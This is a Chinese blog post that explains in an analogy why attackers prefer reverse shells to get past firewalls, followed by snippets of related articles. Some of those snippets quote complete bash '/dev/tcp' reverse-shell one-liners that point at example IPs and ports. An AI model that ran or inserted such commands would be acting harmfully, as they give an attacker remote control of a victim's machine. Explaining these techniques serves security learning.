为什么要反弹shell

最新推荐文章于 2024-04-23 21:45:00 发布
最新推荐文章于 2024-04-23 21:45:00 发布
阅读量501 收藏 1
点赞数
分类专栏: 杂项随记 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_55306747/article/details/125015597
版权

我也不知道这个比喻恰不恰当:

首先是一个城池,我想要控制这个城,就要控制这个城的城主,我手里有控制当前城主的把柄(shell)

但是我要和城主建立起联系才可以控制他,城外有一座大墙(防火墙),会严格检查入城的人(流量审查),所以我不能入城,一旦入城,城里的人可能会发现异样,将城主换掉(打补丁)

不过好在我发现这个城有一个后门,我虽然进不去,但是我把信送进去了,我不去找他,我让城主来找我,我在信上写了我的地址(ip和端口),然后我在预定的位置等待城主的到来(端口监听)

因为城主是城主出城,当然那个大墙拦不住他,所以我们成功建立了联系

反弹shell是让受害者来找攻击者,可以突破大部分防火墙的拦截,而且进行交互的时候没有超时限制,有很多优点,比正向shell安逸多了

苍树青哉
关注
专栏目录
反弹shell原理与实现
悦分享
08-02 3366
反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面、web服务、ssh、telnet等等都是正向连接。...
反弹shell
ADDPPC的博客
11-26 591
反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 为什么要反弹shell? 通常用于被控端因防火墙受限、权限不足、端口被占用等情形。 举例:假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面、.
关于反弹shell的理解
weixin_42151709的博客
03-22 937
想要搞清楚这个问题,首先要搞清楚什么是反弹,为什么要反弹。 假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面,web服务,ssh,telnet等等,都是正向连接。 那么什么情况下正向连接不太好用了呢? 1.某客户机中了你的网马,但是它在局域网内,你直接连接不了。它的ip会动态改变,你不能持续控...
反弹shell的使用
csd_ct的专栏
08-15 223
反弹shell 反弹shell,是指从受害者的机器上主动连接到指定的机器上的可交且能执行命令的TCP进程。反弹shell的前提是受害者的 机器上有命令执行的漏洞。常见的一句话反弹shell,如下: bash 反弹shell bash -i >& /dev/tcp/127.0.0.1/9999 0>&1 2>&1 参数解释: bash -i:产生一个bash的交互环境 “>&”:将联合符号前面的内容与后面的内容相结合然后一起重定向给后者,将标准
shell反弹理解
3569
11-22 1118
http://www.freebuf.com/articles/system/153986.htm 那么这个反弹shell命令到底是什么意思呢 bash -i >&/dev/tcp/192.168.190.138/6666 0>&1  对于速食主义者,后面的内容可以选择忽略 命令 解释 ba
常见的反弹shell的方法以及对反弹shell的解释
热门推荐
qq_45584159的博客
03-04 1万+
文章目录一.什么是反弹shell,以及对反弹shell作用原理的解析:3.反弹shell的本质linux文件描述符重定向输入重定向输出重定向标准输出与标准错误输出重定向文件描述符的复制exec 绑定重定向对反弹shell执行的实例分析:>&、&>常见linux提权 一.什么是反弹shell,以及对反弹shell作用原理的解析: 1.定义 通俗来说,shell就是实现用户命令的接口,通过该接口我们能实现对计算机的控制(root权限), 而反弹shell就是将shell反弹给攻击者
php反弹shell实现代码
10-30
作者想要简化操作流程,因此选择实现了一个反弹Shell到本地监听端口的功能。文档中还提到该代码是在phpspy2008的基础上进行修改,使其成为一个独立的PHP文件,并且上传到服务器上之后,通过设置好反弹的IP和端口来...
Apache-flink 未授权访问任意jar包上传反弹shell.MD
04-12
Apache-flink 未授权访问任意jar包上传反弹shell
反弹Shell大全与原理
weixin_55652418的博客
01-02 1303
more反弹shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。
什么是反弹 Shell
sixqingfeng的博客
07-12 826
前段时间被一位产品经理嘲笑了,说我居然连反弹 Shell 都不知道说实话当时我还真不知道,但这口气咽不下去啊,得赶紧学来看看,这不,我已经学会了学完之后我特地来记录下,同时分享给大家,以后产品经理再也不敢嘲笑我们不懂反弹 Shell 了我们都知道 Shell 的概念吧,简单来说,Shell 就是实现用户命令的接口,通过这个接口我们就能实现对计算机的控制,比如我们常见的 ssh 就是执行的 Shell 命令实现对远程对服务器的控制那反弹 Shell 是啥呢?其英文名叫做 Reverse Shell,具体干什么
linux下反弹shell的原理浅析
黑锤的博客
08-14 780
反弹shell文件描述符与重定向 在这里最难理解的就是文件描述符和重定向这两部分 先来讲一下linux的文件描述符,什么是文件描述符, 在linux系统中将所有设备都当做文件来处理,而linux文件描述符用来标识每个文件对象,在我理解中就是描述符用来指定对象的,这样才能井然有序的运行。在linux系统中就连输入设备和输出设备都被当成是文件来处理就拿显示器和键盘输入都拿来当成文件处理,他们都有...
反弹shell的原理以及应用
zkaqlaoniao的博客
04-19 971
反弹shell(reverse shell),指的就是我们的机器监听在某TCP/UDP端口,然后在希望被我们利用的被控机器发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell其实差不多对应,本质上是网络概念的客户端与服务端的角色反转。
网络安全-反弹shell详解(攻击,检测与防御)
最新发布
2401_84466336的博客
04-23 4672
1.1 什么是 ShellShell 在计算机系统中指的是一个用户界面,用于访问操作系统的服务。在网络安全中,攻击者常利用 Shell 来控制受害者的系统。1.2 反弹 Shell 的工作原理反弹 Shell 的基本原理是:攻击者在其自己的机器上设置监听端口,然后诱使受害者的机器执行一个反向连接的 Shell 命令,连接回攻击者的机器。这样,攻击者就能通过这个反向连接执行命令,控制受害者的计算机。
反弹shell原理简析与病毒脚本案例
Alexz__的博客
03-20 836
1,Linux中文件描述符 2,Linux输入输出重定向 3,反弹shell作用与目的 4,基础反弹shell语句的本质 5,反弹shell多种方式(命令行,php,python,java,nc) 壹 Linux中的文件描述符 首先我们需要回顾一下Linux系统的一个特点:一切皆文件 所有不同种类的类型都被抽象成了文件;如:普通文件、目录、字符设备、块设备、套接字等 当一...
Linux 反弹 Shell
weixin_30727835的博客
08-03 696
攻击场景 Attacker:192.168.0.106 win10 Victim:192.168.2.140 kali NC 反弹 shell Netcat简介 俗称瑞士军刀或NC,小巧强悍,可以读写TCP或UDP网络连接,它被设计成一个可靠的后端工具,能被其它的程序或脚本直接地或容易地驱动。 同时,nc又是一个功能丰富的网络调试和开发工具,因为它可以建立你可能用到的几乎任何...
反弹shell是什么
03-22
反弹shell是一种网络安全攻击技术,也被称为反向连接shell。它的基本原理是攻击者通过在目标系统上运行恶意代码,将目标系统上的shell连接回攻击者控制的远程主机,从而实现对目标系统的远程控制。 具体来说,反弹...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值